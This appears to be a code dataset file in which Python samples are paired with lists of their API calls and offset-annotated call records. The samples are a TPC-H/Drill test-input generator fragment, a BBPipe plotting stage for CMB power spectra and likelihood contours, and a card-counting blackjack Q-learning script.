"-O", "--output", type=str, default="-",
help="Output file path or - for stdout"
)
args = parser.parse_args()
tpch_path = args.tpch_path
tpch.init_schema(drill, tpch_path)
your_queries = ["""select c_custkey, c_nationkey, c_acctbal
from customer where c_custkey < 15""", ]
generate_json_input(drill, tpch_path, your_queries, args.output)
|
[
"argparse.ArgumentParser",
"tpch.init_schema",
"numpy.asarray",
"numpy.dtype",
"pydrill.client.PyDrill",
"pandas.api.types.is_categorical_dtype",
"re.sub",
"pandas.to_numeric"
] |
[((6477, 6513), 'pydrill.client.PyDrill', 'PyDrill', ([], {'host': '"""localhost"""', 'port': '(8047)'}), "(host='localhost', port=8047)\n", (6484, 6513), False, 'from pydrill.client import PyDrill\n'), ((6608, 6699), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate Input Generator for UnitTestGenerator."""'}), "(description=\n 'Generate Input Generator for UnitTestGenerator.')\n", (6631, 6699), False, 'import argparse\n'), ((7010, 7044), 'tpch.init_schema', 'tpch.init_schema', (['drill', 'tpch_path'], {}), '(drill, tpch_path)\n', (7026, 7044), False, 'import tpch\n'), ((340, 375), 're.sub', 're.sub', (["('\\\\s%s(\\\\s|$)' % i)", 'j', 'text'], {}), "('\\\\s%s(\\\\s|$)' % i, j, text)\n", (346, 375), False, 'import re\n'), ((3680, 3719), 'pandas.to_numeric', 'pd.to_numeric', (['df[col]'], {'errors': '"""coerce"""'}), "(df[col], errors='coerce')\n", (3693, 3719), True, 'import pandas as pd\n'), ((3758, 3798), 'pandas.api.types.is_categorical_dtype', 'pd.api.types.is_categorical_dtype', (['dtype'], {}), '(dtype)\n', (3791, 3798), True, 'import pandas as pd\n'), ((4200, 4215), 'numpy.dtype', 'np.dtype', (['dtype'], {}), '(dtype)\n', (4208, 4215), True, 'import numpy as np\n'), ((3358, 3380), 'numpy.asarray', 'np.asarray', (['df[column]'], {}), '(df[column])\n', (3368, 3380), True, 'import numpy as np\n')]
|
from bbpipe import PipelineStage
from .types import FitsFile, DirFile, HTMLFile, NpzFile
import sacc
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import dominate as dom
import dominate.tags as dtg
import os
class BBPlotter(PipelineStage):
name="BBPlotter"
inputs=[('cells_coadded_total', FitsFile), ('cells_coadded', FitsFile),
('cells_noise', FitsFile), ('cells_null', FitsFile),
('cells_fiducial', FitsFile), ('param_chains',NpzFile)]
outputs=[('plots',DirFile), ('plots_page',HTMLFile)]
config_options={'lmax_plot':300, 'plot_coadded_total': True,
'plot_noise': True, 'plot_nulls': True,
'plot_likelihood': True}
def create_page(self):
# Open plots directory
if not os.path.isdir(self.get_output('plots')):
os.mkdir(self.get_output('plots'))
# Create HTML page
self.doc = dom.document(title='BBPipe plots page')
with self.doc.head:
dtg.link(rel='stylesheet', href='style.css')
dtg.script(type='text/javascript', src='script.js')
with self.doc:
dtg.h1("Pipeline outputs")
dtg.h2("Contents:",id='contents')
lst=dtg.ul()
lst+=dtg.li(dtg.a('Bandpasses',href='#bandpasses'))
lst+=dtg.li(dtg.a('Coadded power spectra',href='#coadded'))
if self.config['plot_nulls']:
lst+=dtg.li(dtg.a('Null tests',href='#nulls'))
if self.config['plot_likelihood']:
lst+=dtg.li(dtg.a('Likelihood',href='#like'))
def add_bandpasses(self):
with self.doc:
dtg.h2("Bandpasses",id='bandpasses')
lst=dtg.ul()
# Overall plot
title='Bandpasses summary'
fname=self.get_output('plots')+'/bpass_summary.png'
plt.figure()
plt.title(title,fontsize=14)
for n, t in self.s_fid.tracers.items():
nu_mean=np.sum(t.bandpass*t.nu**3)/np.sum(t.bandpass*t.nu**2)
plt.plot(t.nu,t.bandpass/np.amax(t.bandpass),label=n+', $\\langle\\nu\\rangle=%.1lf\\,{\\rm GHz}$'%nu_mean)
plt.xlabel('$\\nu\\,[{\\rm GHz}]$',fontsize=14)
plt.ylabel('Transmission',fontsize=14)
plt.ylim([0.,1.3])
plt.legend(frameon=0,ncol=2,labelspacing=0.1,loc='upper left')
plt.xscale('log')
plt.savefig(fname,bbox_inches='tight')
plt.close()
lst+=dtg.li(dtg.a(title,href=fname))
for n, t in self.s_fid.tracers.items():
title='Bandpass '+n
fname=self.get_output('plots')+'/bpass_'+n+'.png'
plt.figure()
plt.title(title,fontsize=14)
plt.plot(t.nu,t.bandpass/np.amax(t.bandpass))
plt.xlabel('$\\nu\\,[{\\rm GHz}]$',fontsize=14)
plt.ylabel('Transmission',fontsize=14)
plt.ylim([0.,1.05])
plt.savefig(fname,bbox_inches='tight')
plt.close()
lst+=dtg.li(dtg.a(title,href=fname))
dtg.div(dtg.a('Back to TOC',href='#contents'))
def add_coadded(self):
with self.doc:
dtg.h2("Coadded power spectra",id='coadded')
lst=dtg.ul()
pols = ['e', 'b']
print(self.s_fid.tracers)
for t1, t2 in self.s_cd_x.get_tracer_combinations():
for p1 in range(2):
if t1==t2:
p2range = range(p1, 2)
else:
p2range = range(2)
for p2 in p2range:
x = pols[p1] + pols[p2]
typ = 'cl_' + x
# Plot title
title = f"{t1} x {t2}, {typ}"
# Plot file
fname =self.get_output('plots')+'/cls_'
fname+= f"{t1}_x_{t2}_{typ}.png"
print(fname)
plt.figure()
plt.title(title, fontsize=14)
l, cl = self.s_fid.get_ell_cl(typ, t1, t2)
plt.plot(l[l<self.lmx], cl[l<self.lmx], 'k-', label='Fiducial model')
if self.config['plot_coadded_total']:
l, cl, cov = self.s_cd_t.get_ell_cl(typ, t1, t2, return_cov=True)
msk = l<self.lmx
el = np.sqrt(np.fabs(np.diag(cov)))[msk]
plt.errorbar(l[msk], cl[msk], yerr=el, fmt='ro',
label='Total coadd')
eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='ro', mfc='white')
eb[-1][0].set_linestyle('--')
if self.config['plot_noise']:
l, cl, cov = self.s_cd_n.get_ell_cl(typ, t1, t2, return_cov=True)
msk = l<self.lmx
el = np.sqrt(np.fabs(np.diag(cov)))[msk]
plt.errorbar(l[msk], cl[msk], yerr=el, fmt='yo',
label='Noise')
eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='yo', mfc='white')
eb[-1][0].set_linestyle('--')
l, cl, cov = self.s_cd_x.get_ell_cl(typ, t1, t2, return_cov=True)
msk = l<self.lmx
el = np.sqrt(np.fabs(np.diag(cov)))[msk]
plt.errorbar(l[msk], cl[msk], yerr=el, fmt='bo',
label='Cross-coadd')
eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='bo', mfc='white')
eb[-1][0].set_linestyle('--')
plt.yscale('log')
plt.xlabel('$\\ell$',fontsize=15)
if self.config['compute_dell']:
plt.ylabel('$D_\\ell$',fontsize=15)
else:
plt.ylabel('$C_\\ell$',fontsize=15)
plt.legend()
plt.savefig(fname,bbox_inches='tight')
plt.close()
lst+=dtg.li(dtg.a(title,href=fname))
dtg.div(dtg.a('Back to TOC',href='#contents'))
def add_nulls(self):
with self.doc:
dtg.h2("Null tests",id='nulls')
lst=dtg.ul()
pols = ['e', 'b']
for t1, t2 in self.s_null.get_tracer_combinations():
title = f"{t1} x {t2}"
fname =self.get_output('plots')+'/cls_null_'
fname+= f"{t1}_x_{t2}.png"
print(fname)
plt.figure()
plt.title(title,fontsize=15)
for p1 in range(2):
for p2 in range(2):
x = pols[p1] + pols[p2]
typ='cl_'+x
l, cl, cv = self.s_null.get_ell_cl(typ, t1, t2, return_cov=True)
msk = l<self.lmx
el = np.sqrt(np.fabs(np.diag(cv)))[msk]
plt.errorbar(l[msk], cl[msk]/el,
yerr=np.ones_like(el),
fmt=self.cols_typ[x]+'-', label=x)
plt.xlabel('$\\ell$',fontsize=15)
plt.ylabel('$C_\\ell/\\sigma_\\ell$',fontsize=15)
plt.legend()
                plt.savefig(fname,bbox_inches='tight')
plt.close()
lst+=dtg.li(dtg.a(title,href=fname))
dtg.div(dtg.a('Back to TOC',href='#contents'))
def add_contours(self):
from getdist import MCSamples
from getdist import plots as gplots
with self.doc:
dtg.h2("Likelihood",id='like')
lst=dtg.ul()
# Labels and true values
labdir={'A_lens':'A_{\\rm lens}',
'r_tensor':'r',
'beta_d':'\\beta_d',
'epsilon_ds':'\\epsilon_{ds}',
'alpha_d_bb':'\\alpha_d',
'amp_d_bb':'A_d',
'beta_s':'\\beta_s',
'alpha_s_bb':'\\alpha_s',
'amp_s_bb':'A_s'}
# TODO: we need to build this from the priors, I think.
truth={'A_lens':1.,
'r_tensor':0.,
'beta_d':1.59,
'epsilon_ds':0.,
'alpha_d_bb':-0.2,
'amp_d_bb':5.,
'beta_s':-3.,
'alpha_s_bb':-0.4,
'amp_s_bb':2.}
# Select only parameters for which we have labels
names_common=list(set(list(self.chain['names'])) & truth.keys())
msk_common=np.array([n in names_common for n in self.chain['names']])
npar=len(names_common)
nwalk,nsamp,npar_chain=self.chain['chain'].shape
chain=self.chain['chain'][:,nsamp//4:,:].reshape([-1,npar_chain])[:,msk_common]
names_common=np.array(self.chain['names'])[msk_common]
# Getdist
samples=MCSamples(samples=chain,
names=names_common,
labels=[labdir[n] for n in names_common])
g = gplots.getSubplotPlotter()
g.triangle_plot([samples], filled=True)
for i,n in enumerate(names_common):
v=truth[n]
g.subplots[i,i].plot([v,v],[0,1],'r-')
for j in range(i+1,npar):
u=truth[names_common[j]]
g.subplots[j,i].plot([v],[u],'ro')
# Save
fname=self.get_output('plots')+'/triangle.png'
g.export(fname)
lst+=dtg.li(dtg.a("Likelihood contours",href=fname))
dtg.div(dtg.a('Back to TOC',href='#contents'))
def write_page(self):
with open(self.get_output('plots_page'),'w') as f:
f.write(self.doc.render())
def read_inputs(self):
print("Reading inputs")
# Power spectra
self.s_fid=sacc.Sacc.load_fits(self.get_input('cells_fiducial'))
self.s_cd_x=sacc.Sacc.load_fits(self.get_input('cells_coadded'))
if self.config['plot_coadded_total']:
self.s_cd_t=sacc.Sacc.load_fits(self.get_input('cells_coadded_total'))
if self.config['plot_noise']:
self.s_cd_n=sacc.Sacc.load_fits(self.get_input('cells_noise'))
if self.config['plot_nulls']:
self.s_null=sacc.Sacc.load_fits(self.get_input('cells_null'))
# Chains
if self.config['plot_likelihood']:
self.chain=np.load(self.get_input('param_chains'))
self.cols_typ={'ee':'r','eb':'g','be':'y','bb':'b'}
self.lmx = self.config['lmax_plot']
def run(self):
self.read_inputs()
self.create_page()
self.add_bandpasses()
self.add_coadded()
if self.config['plot_nulls']:
self.add_nulls()
if self.config['plot_likelihood']:
self.add_contours()
self.write_page()
if __name__ == '__main__':
cls = PipelineStage.main()
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.yscale",
"numpy.sum",
"bbpipe.PipelineStage.main",
"matplotlib.pyplot.figure",
"getdist.MCSamples",
"numpy.diag",
"matplotlib.pyplot.close",
"dominate.tags.link",
"matplotlib.pyplot.errorbar",
"dominate.tags.h1",
"numpy.ones_like",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.legend",
"dominate.tags.a",
"getdist.plots.getSubplotPlotter",
"matplotlib.use",
"dominate.tags.h2",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xscale",
"matplotlib.pyplot.plot",
"dominate.document",
"numpy.amax",
"dominate.tags.script",
"numpy.array",
"matplotlib.pyplot.xlabel",
"dominate.tags.ul",
"matplotlib.pyplot.savefig"
] |
[((138, 159), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (152, 159), False, 'import matplotlib\n'), ((11386, 11406), 'bbpipe.PipelineStage.main', 'PipelineStage.main', ([], {}), '()\n', (11404, 11406), False, 'from bbpipe import PipelineStage\n'), ((952, 991), 'dominate.document', 'dom.document', ([], {'title': '"""BBPipe plots page"""'}), "(title='BBPipe plots page')\n", (964, 991), True, 'import dominate as dom\n'), ((1032, 1076), 'dominate.tags.link', 'dtg.link', ([], {'rel': '"""stylesheet"""', 'href': '"""style.css"""'}), "(rel='stylesheet', href='style.css')\n", (1040, 1076), True, 'import dominate.tags as dtg\n'), ((1089, 1140), 'dominate.tags.script', 'dtg.script', ([], {'type': '"""text/javascript"""', 'src': '"""script.js"""'}), "(type='text/javascript', src='script.js')\n", (1099, 1140), True, 'import dominate.tags as dtg\n'), ((1176, 1202), 'dominate.tags.h1', 'dtg.h1', (['"""Pipeline outputs"""'], {}), "('Pipeline outputs')\n", (1182, 1202), True, 'import dominate.tags as dtg\n'), ((1215, 1249), 'dominate.tags.h2', 'dtg.h2', (['"""Contents:"""'], {'id': '"""contents"""'}), "('Contents:', id='contents')\n", (1221, 1249), True, 'import dominate.tags as dtg\n'), ((1265, 1273), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (1271, 1273), True, 'import dominate.tags as dtg\n'), ((1690, 1727), 'dominate.tags.h2', 'dtg.h2', (['"""Bandpasses"""'], {'id': '"""bandpasses"""'}), "('Bandpasses', id='bandpasses')\n", (1696, 1727), True, 'import dominate.tags as dtg\n'), ((1743, 1751), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (1749, 1751), True, 'import dominate.tags as dtg\n'), ((1894, 1906), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1904, 1906), True, 'import matplotlib.pyplot as plt\n'), ((1919, 1948), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (1928, 1948), True, 'import matplotlib.pyplot as plt\n'), ((2214, 2262), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\nu\\\\,[{\\\\rm GHz}]$"""'], {'fontsize': '(14)'}), "('$\\\\nu\\\\,[{\\\\rm GHz}]$', fontsize=14)\n", (2224, 2262), True, 'import matplotlib.pyplot as plt\n'), ((2274, 2313), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Transmission"""'], {'fontsize': '(14)'}), "('Transmission', fontsize=14)\n", (2284, 2313), True, 'import matplotlib.pyplot as plt\n'), ((2325, 2345), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.3]'], {}), '([0.0, 1.3])\n', (2333, 2345), True, 'import matplotlib.pyplot as plt\n'), ((2356, 2421), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'frameon': '(0)', 'ncol': '(2)', 'labelspacing': '(0.1)', 'loc': '"""upper left"""'}), "(frameon=0, ncol=2, labelspacing=0.1, loc='upper left')\n", (2366, 2421), True, 'import matplotlib.pyplot as plt\n'), ((2431, 2448), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""log"""'], {}), "('log')\n", (2441, 2448), True, 'import matplotlib.pyplot as plt\n'), ((2461, 2500), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (2472, 2500), True, 'import matplotlib.pyplot as plt\n'), ((2512, 2523), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2521, 2523), True, 'import matplotlib.pyplot as plt\n'), ((3277, 3322), 'dominate.tags.h2', 'dtg.h2', (['"""Coadded power spectra"""'], {'id': '"""coadded"""'}), "('Coadded power spectra', id='coadded')\n", (3283, 3322), True, 'import dominate.tags as dtg\n'), ((3338, 3346), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (3344, 3346), 
True, 'import dominate.tags as dtg\n'), ((6560, 6592), 'dominate.tags.h2', 'dtg.h2', (['"""Null tests"""'], {'id': '"""nulls"""'}), "('Null tests', id='nulls')\n", (6566, 6592), True, 'import dominate.tags as dtg\n'), ((6608, 6616), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (6614, 6616), True, 'import dominate.tags as dtg\n'), ((7989, 8020), 'dominate.tags.h2', 'dtg.h2', (['"""Likelihood"""'], {'id': '"""like"""'}), "('Likelihood', id='like')\n", (7995, 8020), True, 'import dominate.tags as dtg\n'), ((8036, 8044), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (8042, 8044), True, 'import dominate.tags as dtg\n'), ((9010, 9070), 'numpy.array', 'np.array', (["[(n in names_common) for n in self.chain['names']]"], {}), "([(n in names_common) for n in self.chain['names']])\n", (9018, 9070), True, 'import numpy as np\n'), ((9367, 9457), 'getdist.MCSamples', 'MCSamples', ([], {'samples': 'chain', 'names': 'names_common', 'labels': '[labdir[n] for n in names_common]'}), '(samples=chain, names=names_common, labels=[labdir[n] for n in\n names_common])\n', (9376, 9457), False, 'from getdist import MCSamples\n'), ((9530, 9556), 'getdist.plots.getSubplotPlotter', 'gplots.getSubplotPlotter', ([], {}), '()\n', (9554, 9556), True, 'from getdist import plots as gplots\n'), ((1298, 1337), 'dominate.tags.a', 'dtg.a', (['"""Bandpasses"""'], {'href': '"""#bandpasses"""'}), "('Bandpasses', href='#bandpasses')\n", (1303, 1337), True, 'import dominate.tags as dtg\n'), ((1362, 1409), 'dominate.tags.a', 'dtg.a', (['"""Coadded power spectra"""'], {'href': '"""#coadded"""'}), "('Coadded power spectra', href='#coadded')\n", (1367, 1409), True, 'import dominate.tags as dtg\n'), ((2548, 2572), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (2553, 2572), True, 'import dominate.tags as dtg\n'), ((2744, 2756), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2754, 2756), True, 'import matplotlib.pyplot as plt\n'), ((2773, 2802), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (2782, 2802), True, 'import matplotlib.pyplot as plt\n'), ((2880, 2928), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\nu\\\\,[{\\\\rm GHz}]$"""'], {'fontsize': '(14)'}), "('$\\\\nu\\\\,[{\\\\rm GHz}]$', fontsize=14)\n", (2890, 2928), True, 'import matplotlib.pyplot as plt\n'), ((2944, 2983), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Transmission"""'], {'fontsize': '(14)'}), "('Transmission', fontsize=14)\n", (2954, 2983), True, 'import matplotlib.pyplot as plt\n'), ((2999, 3020), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.05]'], {}), '([0.0, 1.05])\n', (3007, 3020), True, 'import matplotlib.pyplot as plt\n'), ((3035, 3074), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (3046, 3074), True, 'import matplotlib.pyplot as plt\n'), ((3090, 3101), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3099, 3101), True, 'import matplotlib.pyplot as plt\n'), ((3175, 3213), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (3180, 3213), True, 'import dominate.tags as dtg\n'), ((6444, 6482), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (6449, 6482), True, 'import dominate.tags as dtg\n'), ((6901, 6913), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6911, 6913), True, 'import matplotlib.pyplot as 
plt\n'), ((6930, 6959), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(15)'}), '(title, fontsize=15)\n', (6939, 6959), True, 'import matplotlib.pyplot as plt\n'), ((7518, 7552), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\ell$"""'], {'fontsize': '(15)'}), "('$\\\\ell$', fontsize=15)\n", (7528, 7552), True, 'import matplotlib.pyplot as plt\n'), ((7568, 7618), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$C_\\\\ell/\\\\sigma_\\\\ell$"""'], {'fontsize': '(15)'}), "('$C_\\\\ell/\\\\sigma_\\\\ell$', fontsize=15)\n", (7578, 7618), True, 'import matplotlib.pyplot as plt\n'), ((7634, 7646), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (7644, 7646), True, 'import matplotlib.pyplot as plt\n'), ((7663, 7701), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_index': '"""tight"""'}), "(fname, bbox_index='tight')\n", (7674, 7701), True, 'import matplotlib.pyplot as plt\n'), ((7717, 7728), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7726, 7728), True, 'import matplotlib.pyplot as plt\n'), ((7803, 7841), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (7808, 7841), True, 'import dominate.tags as dtg\n'), ((9282, 9311), 'numpy.array', 'np.array', (["self.chain['names']"], {}), "(self.chain['names'])\n", (9290, 9311), True, 'import numpy as np\n'), ((10012, 10052), 'dominate.tags.a', 'dtg.a', (['"""Likelihood contours"""'], {'href': 'fname'}), "('Likelihood contours', href=fname)\n", (10017, 10052), True, 'import dominate.tags as dtg\n'), ((10074, 10112), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (10079, 10112), True, 'import dominate.tags as dtg\n'), ((1480, 1514), 'dominate.tags.a', 'dtg.a', (['"""Null tests"""'], {'href': '"""#nulls"""'}), "('Null tests', href='#nulls')\n", (1485, 1514), True, 'import dominate.tags as dtg\n'), ((1590, 1623), 'dominate.tags.a', 'dtg.a', (['"""Likelihood"""'], {'href': '"""#like"""'}), "('Likelihood', href='#like')\n", (1595, 1623), True, 'import dominate.tags as dtg\n'), ((2024, 2054), 'numpy.sum', 'np.sum', (['(t.bandpass * t.nu ** 3)'], {}), '(t.bandpass * t.nu ** 3)\n', (2030, 2054), True, 'import numpy as np\n'), ((2051, 2081), 'numpy.sum', 'np.sum', (['(t.bandpass * t.nu ** 2)'], {}), '(t.bandpass * t.nu ** 2)\n', (2057, 2081), True, 'import numpy as np\n'), ((3130, 3154), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (3135, 3154), True, 'import dominate.tags as dtg\n'), ((7757, 7781), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (7762, 7781), True, 'import dominate.tags as dtg\n'), ((2119, 2138), 'numpy.amax', 'np.amax', (['t.bandpass'], {}), '(t.bandpass)\n', (2126, 2138), True, 'import numpy as np\n'), ((2843, 2862), 'numpy.amax', 'np.amax', (['t.bandpass'], {}), '(t.bandpass)\n', (2850, 2862), True, 'import numpy as np\n'), ((4099, 4111), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4109, 4111), True, 'import matplotlib.pyplot as plt\n'), ((4136, 4165), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (4145, 4165), True, 'import matplotlib.pyplot as plt\n'), ((4257, 4330), 'matplotlib.pyplot.plot', 'plt.plot', (['l[l < self.lmx]', 'cl[l < self.lmx]', '"""k-"""'], {'label': '"""Fiducial model"""'}), "(l[l < self.lmx], cl[l < self.lmx], 'k-', label='Fiducial model')\n", (4265, 4330), True, 'import 
matplotlib.pyplot as plt\n'), ((5659, 5728), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""bo"""', 'label': '"""Cross-coadd"""'}), "(l[msk], cl[msk], yerr=el, fmt='bo', label='Cross-coadd')\n", (5671, 5728), True, 'import matplotlib.pyplot as plt\n'), ((5793, 5859), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""bo"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='bo', mfc='white')\n", (5805, 5859), True, 'import matplotlib.pyplot as plt\n'), ((5936, 5953), 'matplotlib.pyplot.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (5946, 5953), True, 'import matplotlib.pyplot as plt\n'), ((5978, 6012), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\ell$"""'], {'fontsize': '(15)'}), "('$\\\\ell$', fontsize=15)\n", (5988, 6012), True, 'import matplotlib.pyplot as plt\n'), ((6250, 6262), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6260, 6262), True, 'import matplotlib.pyplot as plt\n'), ((6287, 6326), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (6298, 6326), True, 'import matplotlib.pyplot as plt\n'), ((6350, 6361), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6359, 6361), True, 'import matplotlib.pyplot as plt\n'), ((4625, 4694), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""ro"""', 'label': '"""Total coadd"""'}), "(l[msk], cl[msk], yerr=el, fmt='ro', label='Total coadd')\n", (4637, 4694), True, 'import matplotlib.pyplot as plt\n'), ((4767, 4833), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""ro"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='ro', mfc='white')\n", (4779, 4833), True, 'import matplotlib.pyplot as plt\n'), ((5180, 5243), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""yo"""', 'label': '"""Noise"""'}), "(l[msk], cl[msk], yerr=el, fmt='yo', label='Noise')\n", (5192, 5243), True, 'import matplotlib.pyplot as plt\n'), ((5316, 5382), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""yo"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='yo', mfc='white')\n", (5328, 5382), True, 'import matplotlib.pyplot as plt\n'), ((6096, 6132), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$D_\\\\ell$"""'], {'fontsize': '(15)'}), "('$D_\\\\ell$', fontsize=15)\n", (6106, 6132), True, 'import matplotlib.pyplot as plt\n'), ((6190, 6226), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$C_\\\\ell$"""'], {'fontsize': '(15)'}), "('$C_\\\\ell$', fontsize=15)\n", (6200, 6226), True, 'import matplotlib.pyplot as plt\n'), ((6398, 6422), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (6403, 6422), True, 'import dominate.tags as dtg\n'), ((7412, 7428), 'numpy.ones_like', 'np.ones_like', (['el'], {}), '(el)\n', (7424, 7428), True, 'import numpy as np\n'), ((5615, 5627), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (5622, 5627), True, 'import numpy as np\n'), ((7294, 7305), 'numpy.diag', 'np.diag', (['cv'], {}), '(cv)\n', (7301, 7305), True, 'import numpy as np\n'), ((4577, 4589), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (4584, 4589), True, 'import numpy as np\n'), ((5132, 5144), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (5139, 5144), True, 'import numpy as np\n')]
|
# Finite Decks, Aces = reactive
# this program just uses the count information to maximize score.
import numpy as np
import matplotlib.pyplot as plt
import random
from rl_tools import (
simulation,
scorecalc,
countcalc,
initializedrawpile,
actionupdate,
acecheck,
cardvalue,
newcard,
twist,
qtableupdate,
)
e = 0.1
nodecks = 6
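# e is presumably the epsilon used for epsilon-greedy exploration and nodecks
# the number of decks in the draw pile (both inferred from how they are used below).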
def learning(e, nodecks):
Qtable = np.zeros(
(34, 2, 5)
    ) # columns for twisting and sticking. Extra dimension for divisions of count.
# divisions of count will be c<-10, -10<=c<-3, -3<=c<=3, 3<c<=10, c>10
    Instances = np.zeros((34, 2, 5)) # columns for twisting and sticking.
for n in range(1000):
drawpile = initializedrawpile(nodecks)
while any(drawpile != 0):
Qtable, Instances, drawpile = simulation(Qtable, Instances, drawpile, e)
fig = plt.figure()
ax1 = fig.add_subplot(211)
ax1.plot(range(34), np.sum(Qtable[:, 1, :], axis=1))
ax1.plot(range(34), np.sum(Qtable[:, 0, :], axis=1), color="red")
ax1.legend(["Twist", "Fold"])
ax1.set_ylabel("Average Score")
ax1.set_xlabel("Hand value")
ax1.set(xlim=(-1, 22), ylim=(0, max(np.sum(Qtable[:, 0, :], axis=1)) * 1.1))
plt.xticks(np.arange(0, 22, 1))
plt.show()
testscore = test(Qtable, nodecks)
return Qtable, testscore
# function to test the results of the Qtable on unseen data. No exploration.
def test(Qtable, nodecks):
testscore = np.asarray([])
drawpile = initializedrawpile(nodecks)
while any(drawpile != 0):
        # receive first card
card, drawpile = twist(drawpile)
truecount = countcalc(drawpile)
cardsinhand = np.array([0, card])
newaction = np.argmax(Qtable[sum(cardsinhand), :, truecount])
    # while they haven't folded or gone bust
while (
newaction == 1
and (sum(cardsinhand) < 22 or 11 in cardsinhand)
and any(drawpile != 0)
):
if sum(cardsinhand) > 21:
# if over 21 replace 11 with 1 for aces.
cardsinhand = acecheck(sum(cardsinhand), cardsinhand)
# now we have changed 11 to 1, find new action.
newaction = actionupdate(Qtable, sum(cardsinhand), e, truecount)
else:
card, drawpile = newcard(newaction, drawpile)
cardsinhand = np.append(cardsinhand, card)
cardsinhand = acecheck(sum(cardsinhand), cardsinhand)
truecount = countcalc(drawpile)
# determine whether to stick or twist
newaction = np.argmax(Qtable[sum(cardsinhand), :, truecount])
score = scorecalc(sum(cardsinhand), len(cardsinhand))
testscore = np.append(testscore, score)
return np.mean(testscore)
|
[
"rl_tools.initializedrawpile",
